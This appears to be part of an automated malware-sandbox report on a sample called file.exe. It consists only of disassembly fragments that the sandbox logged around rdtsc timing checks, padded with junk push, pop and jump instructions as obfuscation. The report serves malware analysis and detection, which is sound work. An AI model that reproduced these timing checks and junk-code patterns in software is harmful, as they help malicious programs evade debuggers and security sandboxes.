                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E900B0 second address: 4E90144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8CDABECh 0x00000009 adc ah, 00000008h 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 popfd 0x00000012 movzx ecx, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 and esp, FFFFFFF8h 0x0000001b jmp 00007FD0F8CDABEBh 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 movzx esi, di 0x00000025 pushfd 0x00000026 jmp 00007FD0F8CDABF1h 0x0000002b add ah, FFFFFFD6h 0x0000002e jmp 00007FD0F8CDABF1h 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov ebx, esi 0x0000003b pushfd 0x0000003c jmp 00007FD0F8CDABF6h 0x00000041 jmp 00007FD0F8CDABF5h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90144 second address: 4E901B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7B8h 0x0000000c sbb cx, 52B8h 0x00000011 jmp 00007FD0F8E1A7ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b jmp 00007FD0F8E1A7B6h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov si, bx 0x00000027 call 00007FD0F8E1A7B9h 0x0000002c pop esi 0x0000002d popad 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E901B0 second address: 4E901F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0F8CDABECh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f sub esi, 1C129F3Eh 0x00000015 jmp 00007FD0F8CDABF9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E901F6 second address: 4E901FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E901FA second address: 4E90200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90200 second address: 4E90214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90214 second address: 4E90236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABF6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90236 second address: 4E9026F instructions: 0x00000000 rdtsc 0x00000002 mov ah, E6h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebx, dword ptr [ebp+10h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007FD0F8E1A7B2h 0x00000015 jmp 00007FD0F8E1A7B5h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9026F second address: 4E902A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8CDABF8h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902A1 second address: 4E902A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902A7 second address: 4E902DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0F8CDABF5h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902DD second address: 4E902E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902E3 second address: 4E902E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902E7 second address: 4E902EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902EB second address: 4E9030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0F8CDABF2h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9030A second address: 4E90341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FD0F8E1A7B6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0F8E1A7AEh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90341 second address: 4E90368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABF5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90368 second address: 4E903AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov ax, 2ED3h 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 je 00007FD16B418A33h 0x0000001a jmp 00007FD0F8E1A7ABh 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov edx, 0984C896h 0x0000002e mov cx, di 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903AC second address: 4E903BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABEFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903BF second address: 4E903EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD16B4189F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903EA second address: 4E903EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903EE second address: 4E903F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903F4 second address: 4E90480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8CDABF0h 0x00000009 add cl, 00000048h 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 popfd 0x00000012 jmp 00007FD0F8CDABF8h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [esi+44h] 0x0000001d jmp 00007FD0F8CDABF0h 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 pushad 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD0F8CDABECh 0x0000002d sub si, 4708h 0x00000032 jmp 00007FD0F8CDABEBh 0x00000037 popfd 0x00000038 mov ebx, eax 0x0000003a popad 0x0000003b mov cl, 6Eh 0x0000003d popad 0x0000003e test edx, 61000000h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FD0F8CDABEAh 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80756 second address: 4E8075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8075C second address: 4E80760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80760 second address: 4E80780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7B5h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80780 second address: 4E8082C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 xor cx, 9FD8h 0x00000016 jmp 00007FD0F8CDABEBh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov bl, ah 0x0000001f pushfd 0x00000020 jmp 00007FD0F8CDABEBh 0x00000025 add cl, FFFFFF9Eh 0x00000028 jmp 00007FD0F8CDABF9h 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 pushad 0x00000033 mov al, B2h 0x00000035 pushfd 0x00000036 jmp 00007FD0F8CDABF9h 0x0000003b xor si, 9386h 0x00000040 jmp 00007FD0F8CDABF1h 0x00000045 popfd 0x00000046 popad 0x00000047 and esp, FFFFFFF8h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FD0F8CDABEDh 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8082C second address: 4E808FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e mov cx, FE0Fh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov esi, edx 0x00000017 mov ax, dx 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c jmp 00007FD0F8E1A7B9h 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 mov esi, edi 0x0000002a pushfd 0x0000002b jmp 00007FD0F8E1A7B7h 0x00000030 and ecx, 677BC2DEh 0x00000036 jmp 00007FD0F8E1A7B9h 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f call 00007FD0F8E1A7B3h 0x00000044 pushfd 0x00000045 jmp 00007FD0F8E1A7B8h 0x0000004a add ecx, 45BFFD38h 0x00000050 jmp 00007FD0F8E1A7ABh 0x00000055 popfd 0x00000056 pop esi 0x00000057 popad 0x00000058 mov esi, dword ptr [ebp+08h] 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e movzx eax, di 0x00000061 mov dl, 18h 0x00000063 popad 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E808FD second address: 4E80923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD0F8CDABF4h 0x00000012 pop eax 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80923 second address: 4E8093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8093A second address: 4E80975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FD0F8CDABF3h 0x00000015 pop esi 0x00000016 mov ch, dh 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80975 second address: 4E8097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8097B second address: 4E8097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8097F second address: 4E809B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD16B4201ADh 0x0000000e pushad 0x0000000f mov dl, BEh 0x00000011 mov ch, CDh 0x00000013 popad 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007FD0F8E1A7B3h 0x00000020 mov ecx, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E809B5 second address: 4E809B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E809B9 second address: 4E809D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E809D4 second address: 4E80A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 054Ah 0x00000007 jmp 00007FD0F8CDABEBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD16B2E05A0h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FD0F8CDABF4h 0x0000001c sbb ax, 1038h 0x00000021 jmp 00007FD0F8CDABEBh 0x00000026 popfd 0x00000027 jmp 00007FD0F8CDABF8h 0x0000002c popad 0x0000002d test byte ptr [77516968h], 00000002h 0x00000034 pushad 0x00000035 mov bl, al 0x00000037 pushad 0x00000038 mov eax, edx 0x0000003a mov esi, ebx 0x0000003c popad 0x0000003d popad 0x0000003e jne 00007FD16B2E055Ch 0x00000044 pushad 0x00000045 mov si, bx 0x00000048 mov ebx, 371E640Ch 0x0000004d popad 0x0000004e mov edx, dword ptr [ebp+0Ch] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 movzx eax, di 0x00000057 call 00007FD0F8CDABF9h 0x0000005c pop eax 0x0000005d popad 0x0000005e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80A74 second address: 4E80ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov dx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD0F8E1A7B7h 0x00000016 xor cl, FFFFFFCEh 0x00000019 jmp 00007FD0F8E1A7B9h 0x0000001e popfd 0x0000001f mov ah, BCh 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80ABC second address: 4E80AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80AC2 second address: 4E80AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80AC6 second address: 4E80B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD0F8CDABF1h 0x00000013 or cx, 2866h 0x00000018 jmp 00007FD0F8CDABF1h 0x0000001d popfd 0x0000001e movzx esi, di 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD0F8CDABF6h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B28 second address: 4E80B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FD0F8E1A7ACh 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B4E second address: 4E80B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push dword ptr [ebp+14h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop ebx 0x0000000e movzx eax, bx 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B60 second address: 4E80BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7B2h 0x00000009 adc si, 1F28h 0x0000000e jmp 00007FD0F8E1A7ABh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD0F8E1A7B8h 0x0000001a or ecx, 10CD5188h 0x00000020 jmp 00007FD0F8E1A7ABh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push dword ptr [ebp+10h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD0F8E1A7B5h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C38 second address: 4E80C65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABEDh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C65 second address: 4E80C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C7C second address: 4E80C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C82 second address: 4E80C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7188C2 second address: 7188C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90DC3 second address: 4E90E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD0F8E1A7B0h 0x0000000f push eax 0x00000010 jmp 00007FD0F8E1A7ABh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD0F8E1A7B4h 0x0000001d and cx, 1A38h 0x00000022 jmp 00007FD0F8E1A7ABh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FD0F8E1A7ABh 0x00000032 sub eax, 3153E7FEh 0x00000038 jmp 00007FD0F8E1A7B9h 0x0000003d popfd 0x0000003e movzx eax, bx 0x00000041 popad 0x00000042 pop ebp 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FD0F8E1A7B9h 0x0000004a sbb ax, FCE6h 0x0000004f jmp 00007FD0F8E1A7B1h 0x00000054 popfd 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B53 second address: 4E90B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B68 second address: 4E90B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B8D second address: 4E90B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABECh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B9D second address: 4E90C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD0F8E1A7B9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FD0F8E1A7AEh 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007FD0F8E1A7AEh 0x0000001f push eax 0x00000020 pushfd 0x00000021 jmp 00007FD0F8E1A7B1h 0x00000026 xor eax, 2C040436h 0x0000002c jmp 00007FD0F8E1A7B1h 0x00000031 popfd 0x00000032 pop eax 0x00000033 popad 0x00000034 pop ebp 0x00000035 pushad 0x00000036 movsx edi, cx 0x00000039 push eax 0x0000003a push edx 0x0000003b call 00007FD0F8E1A7B4h 0x00000040 pop esi 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10D65 second address: 4F10D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10D6B second address: 4F10D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, di 0x0000000d mov ch, dl 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FD0F8E1A7ACh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10D90 second address: 4F10DAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10DAD second address: 4F10DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, edi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10DBD second address: 4F10DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F101BA second address: 4F101BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F101BE second address: 4F101D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F101D3 second address: 4F101E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F101E3 second address: 4F101E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10045 second address: 4F100C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d pushfd 0x0000000e jmp 00007FD0F8E1A7B8h 0x00000013 add esi, 7D1878D8h 0x00000019 jmp 00007FD0F8E1A7ABh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B2h 0x00000029 xor esi, 55C14338h 0x0000002f jmp 00007FD0F8E1A7ABh 0x00000034 popfd 0x00000035 push esi 0x00000036 pop edi 0x00000037 popad 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b pushad 0x0000003c mov bx, 73B2h 0x00000040 push eax 0x00000041 push edx 0x00000042 mov ebx, 447C22ACh 0x00000047 rdtsc
